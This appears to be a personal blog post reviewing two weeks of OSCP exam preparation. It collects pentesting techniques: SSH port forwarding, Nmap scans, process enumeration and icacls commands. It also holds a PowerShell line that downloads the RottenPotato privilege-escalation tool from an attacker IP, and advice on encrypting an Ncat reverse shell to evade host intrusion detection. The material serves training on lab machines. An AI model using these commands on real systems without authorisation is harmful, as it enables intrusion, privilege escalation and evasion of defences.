OSCP Preparation 1: 2 Weeks In Review
Contents
OSCP officially starts for me on June 2nd, 2018. I purchased 60 days since I had to pay out of pocket and shit, that was expensive. In order to mitigate some of the inevitable head bashing I have been hitting the books hard. And by books, I really mean Hack The Box and VulnHub. My main goals are to define my service/version enumeration weaknesses and obtain new methods for pre/post-exploitation techniques. Primarily, working on Windows hosts as that’s one of the areas I am not very competent in.
The OSCP Preparation posts will detail any tools, techniques, and different tech that I have encountered. So, here is at least two weeks of knowledge gained in one post. (I Plan on doing this weekly from here on out).
[hr]
[Linux] SSH Port Forwarding (SSH Tunneling):
There have now been a handful of times where a service/process was running on a localhost that could be exploited, however, connections to it were limited to localhost only but could not be exploited, efficiently or effectively, on the actual host. Rather, we need to make it look like the connection is coming from the localhost but, it’s really coming from my Kali box.
1 2 3 4 |
# Port Forward ssh -L 1234:localhost:1234 user@192.168.1.30 |
Nmap -L Flag MAN Page Entry:
1 2 3 4 |
# Port Forward SevroSecurity.com to localhost on port 443 ssh -L 443:sevrosecurity.com:443 -Nf localhost |
[hr]
[Windows] Powershell Command Execution within CMD:
Having worked primarily with Linux, Windows post-exploitation enumeration is a continually steep learning curve for me. But, persistence has paid off. Here is one technique I have found when all you have is a Cmd.exe reverse shell.
Basic Powershell Commands within CMD.exe:
1 2 3 4 |
# Simple Powershell Command powershell -command ("whoami") |
Download a File (Similar to Linux’s WGET):
1 2 3 4 |
# Download a file (Similar to Linux's WGET) powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe') |
[hr]
Service Version Enumeration:
In every box writeup that I have on the site so far, there is one constant and that’s the NMAP scan. But, I found that in a more real-world scenario constant enumeration is key. The initial Nmap scan is a great start but, the following scans are always running in the background when I first get started. Effective and efficient enumeration is key. With that said, here are my five Go-To’s right away.
-
- Initial TCP Scan (Most Common Ports)
- nmap -sC -sV -oA initial-TCP <IP>
- Full TCP Scan
- nmap -sC -sV -p- -v -oA Full-TCP <IP>
- Initial UDP Scan (Most Common Ports)
- nmap -sU -sV -oA -oA initial-UDP <IP>
- Full UDP Scan
- nmap -sU -sV -p- -oA Full-UDP <IP>
- Vulnerability Checking
- nmap –script vuln -v -oA vulns <IP>
- Initial TCP Scan (Most Common Ports)
[hr]
[Linux] Post-Exploitation Process Enumeration:
One of the things we have talked about before is the post-exploitation techniques, mainly for Linux. One item that I have missed and has proven to be very valuable has been process enumeration. Specifically, root level processes.
1 2 3 4 |
ps aux | grep root ps -ef | grep root |
There have been several times where this simple enumeration has lead to a successful privilege escalation on a box. If it works, it ain’t stupid!
[hr]
Encrypted Netcat Communications:
Okay, say you have a reverse shell but there’s a HIDS or some form of traffic signature analysis that is actively being measured on a host. One awesome way to mitigate string pattern matching is to encrypt your reverse or bind shell. First, let’s take a look at a regular reverse shell.
As you can see, we caught the Windows 10 reverse shell from Ncat and we subsequently ran “whoami”. When we analyze the data generated from this session in Wireshark, we can plainly see our data is in plaintext as seen below.
We can easily avoid this plaintext command disclosure by adding the –ssl flag to our Ncat syntax:
And we can now verify that our communication is in-fact encrypted with Wireshark.
[hr]
[Windows] CACLS – iCACLS:
Like I said before, Windows is not my strong suit, yet! Us OSCP goers and professional Penetration Testers first check for low hanging fruit but for me, I don’t know the windows fruit from a damn rabbit hole. So, a simple yet humbling discovery is how to manipulate basic file and directory permissions from a cmd.exe shell. This is where the ICACLS come it. It’s Windows native Access Control List binary and you need to know it.
I’m not going to do a huge write-up on ICACLS so here are some simple commands:
1 2 3 4 5 6 |
Check Permissions: icacls putty.exe Force Remove: icacls putty.exe /deny admin:(F) Then add Read + Execute: icacls putty.exe /grant:r admin:(RX) Validate Permissions: icacls putty.exe |